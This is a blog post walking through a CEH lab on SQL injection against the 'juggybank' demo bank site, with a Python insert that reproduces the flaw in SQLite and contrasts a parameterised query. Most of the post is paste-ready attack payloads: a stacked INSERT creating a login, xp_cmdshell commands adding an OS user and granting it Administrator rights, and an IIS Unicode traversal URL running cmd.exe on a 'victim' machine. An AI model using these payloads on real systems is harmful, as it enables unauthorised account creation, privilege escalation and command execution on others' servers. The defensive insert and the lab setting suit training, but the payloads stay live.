Friday, March 19, 2010

JuggyBank SQL Injection Mini Lab Demo

This lab depends on the "juggybank" website that comes with the CEH courseware, with SQL Server installed on the target machine. These are simple examples of SQL injection attacks, but if they work, almost any SQL statement will also. If the database is something other than SQL Server, only the syntax of the SQL statements will change; the basis for the attack is actually the weak ASP scripts used for the juggybank login.

Hack Script
Point your browser to the juggybank site. Enter a single tick into the username field or address bar. If a page is returned saying "access is denied" or "CGI error", then you are in business.

Paste this into the username field. It will create a new user 'furynax' with password 'loop' at the app level.
';insert into userinfo values('furynax','loop')--


Paste this into the address bar to create user furynax at the OS level with normal user privileges.
';exec master..xp_cmdshell 'net user /add furynax loop';--


Use this command in the browser address bar to give user furynax Administrator privileges.
';exec master..xp_cmdshell 'net localgroup Administrators /add furynax loop';--
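All three steps above ride on the same defect named at the top of the post: the login script pastes the form fields straight into the SQL text, so the tick ends the string literal and the rest of the input becomes SQL. The following is an added example (not part of the post or of the CEH lab) that reproduces that pattern against an in-memory SQLite table with an assumed userinfo(username, password) schema, runs the post's single-tick probe and the stacked INSERT payload against it, and then shows the same inputs against a parameterised query, where they are compared as plain strings and nothing is inserted.

```python
import sqlite3

# Payloads quoted from the post above: the single-tick probe and the stacked INSERT.
PROBE = "'"
PAYLOAD_INSERT = "';insert into userinfo values('furynax','loop')--"


def make_db():
    """Constructed in-memory stand-in for the lab's userinfo table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo (username TEXT, password TEXT)")
    conn.execute("INSERT INTO userinfo VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def list_users(conn):
    """Usernames currently in the table, sorted, so each run can be inspected."""
    return [row[0] for row in conn.execute(
        "SELECT username FROM userinfo ORDER BY username")]


def login_vulnerable(conn, username, password):
    """The weak pattern: form fields concatenated into the SQL and sent as one batch.

    executescript() stands in for a driver that runs every statement it is
    handed, which is what lets the ';insert ... --' tail execute.
    Returns None when the batch ran, or the database error text (the
    'CGI error' page the post tells you to look for after the tick probe).
    """
    sql = ("SELECT * FROM userinfo WHERE username='" + username +
           "' AND password='" + password + "'")
    try:
        conn.executescript(sql)
        return None
    except sqlite3.Error as exc:
        return str(exc)


def login_safe(conn, username, password):
    """Parameterised query: the input never becomes SQL text, only a bound value."""
    row = conn.execute(
        "SELECT count(*) FROM userinfo WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] == 1


def demo():
    """Run both login implementations against the post's inputs and report."""
    results = {}
    conn = make_db()
    # Tick probe: the concatenated query is now malformed, so the DB raises.
    results["probe_error"] = login_vulnerable(conn, PROBE, "")
    # Stacked INSERT: the batch runs the second statement and adds 'furynax'.
    login_vulnerable(conn, PAYLOAD_INSERT, "x")
    results["users_after_vulnerable"] = list_users(conn)

    conn2 = make_db()
    # Same payload through the parameterised query: just a failed login.
    results["safe_login_with_payload"] = login_safe(conn2, PAYLOAD_INSERT, "x")
    results["users_after_safe"] = list_users(conn2)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

The OS-level steps in the post additionally need the web application's database login to be a sysadmin and xp_cmdshell to be enabled; running the application under a least-privilege SQL login and leaving xp_cmdshell disabled (it is an sp_configure option) closes that path even before the query is fixed.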


Paste this command into the address bar to explore the C: drive of the victim machine. Similarly, you can use mkdir or other native MS-DOS commands. The only real limits are your skill and imagination in using it.
http://(victim ip)/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

